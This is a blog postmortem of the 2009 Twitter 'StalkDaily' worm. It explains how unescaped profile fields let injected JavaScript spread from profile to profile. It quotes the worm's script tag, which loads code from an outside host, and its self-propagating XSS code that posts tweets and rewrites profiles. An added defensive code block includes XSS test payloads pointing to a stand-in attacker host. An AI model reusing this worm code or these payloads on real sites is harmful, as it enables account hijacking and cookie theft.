Damon Cortesi's blog

Musings of an entrepreneur.

Twitter StalkDaily Worm Postmortem


Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"

The script tag is the particularly bad part and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

What appears to have happened is that somebody realized they could save URL-encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing an already-infected profile page on Twitter. If you visited an infected profile, the JavaScript in the profile would execute, tweet the misleading link, and update your profile with the same malicious JavaScript, thereby infecting anybody who then visits your profile on twitter.com.
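The bug class described above, as an added example that is not from the worm or from Twitter's code: a stored profile URL concatenated into markup unescaped, next to a version that validates the scheme on input and HTML-encodes on output. The function names and the `example.com` / `attacker.example` payloads are constructed for illustration.

```javascript
// Added example, not Twitter's code. Payloads below are constructed.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that can break out of an HTML attribute or element.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable pattern: the stored value is concatenated into markup as-is,
// so a quote in the value closes href="..." and the rest is parsed as HTML.
function renderProfileLinkUnsafe(storedUrl) {
  return '<a href="' + storedUrl + '">' + storedUrl + '</a>';
}

// Input check: accept only absolute http(s) URLs; returns the parser's
// normalized form, or null when the value is rejected.
function normalizeProfileUrl(input) {
  let u;
  try {
    u = new URL(input);
  } catch (err) {
    return null;
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.href;
}

// Hardened rendering: validate first, then encode at the point of output.
function renderProfileLinkSafe(storedUrl) {
  const url = normalizeProfileUrl(storedUrl);
  if (url === null) return '';
  const e = escapeHtml(url);
  return '<a href="' + e + '" rel="nofollow noopener">' + e + '</a>';
}

// Constructed payloads with the same shape as the injected profile URL.
const SAMPLES = [
  'https://example.com/me',
  'http://example.com"></a><script src="http://attacker.example/x.js"></script><a ',
  'http://example.com/"><script src="http://attacker.example/x.js"></script>',
  'javascript:alert(1)',
];

for (const s of SAMPLES) {
  console.log('unsafe:', renderProfileLinkUnsafe(s));
  console.log('safe:  ', renderProfileLinkSafe(s) || '(rejected)');
}
```

Output encoding is the control that matters here; the scheme check only narrows what gets stored, and a value that passes it is still encoded before it reaches the page.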

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there - the Internet is a dangerous place. :)

Update (2009-04-12): A brief update - another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.
